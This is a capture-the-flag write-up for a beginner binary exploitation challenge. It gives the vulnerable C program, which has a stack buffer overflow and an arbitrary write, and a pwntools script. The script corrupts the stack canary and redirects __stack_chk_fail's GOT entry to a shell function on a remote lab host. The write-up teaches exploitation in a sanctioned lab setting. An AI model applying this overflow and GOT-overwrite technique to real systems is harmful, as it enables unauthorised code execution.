Write-up of the challenge “Ssp_000”
This challenge is part of the “Binary exploitation” category and is in Level 1.
Goal of the challenge
The objective of this challenge is to buffer overflow and overwrite the RIP to make it point to get_shell. The binary helps us with letting us first write to the buffer where we want to overwrite it’s RIP and then it let’s us change a certain address to a certain address.
Program structure
#include <stdio.h>#include <stdlib.h>#include <signal.h>#include <unistd.h>
void alarm_handler() { puts("TIME OUT"); exit(-1);}
void initialize() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0);
signal(SIGALRM, alarm_handler); alarm(30);}
void get_shell() { system("/bin/sh");}
int main(int argc, char *argv[]) { long addr; long value; char buf[0x40] = {};
initialize();
read(0, buf, 0x80);
printf("Addr : "); scanf("%ld", &addr); printf("Value : "); scanf("%ld", &value);
*(long *)addr = value;
return 0;}Security breach
The vunlerability here is:
read(0, buf, 0x80);It is a basic buffer overflow where the buff is 0x40 and we are reading 0x80.
Solution
So my idea is to buffer overflow as our first input to make it crash the canary. After that we change the address of the function that is called when the canary crash (__stack_chk_fail) and make it point to get_shell. While researching what function is called when the canary gets corrupted this helped a lot https://sigma-star.at/blog/2023/05/stack-canary/
solve.py:
from pwn import *
p = remote('host8.dreamhack.games', 12517)# p = process('./ssp_000')
elf = ELF('./ssp_000')
get_shell = elf.sym['get_shell']canary = elf.got['__stack_chk_fail']
payload = "A" * 120p.send(payload)
p.sendlineafter('Addr : ', str(canary).encode())p.sendlineafter('Value : ', str(get_shell).encode())
p.interactive()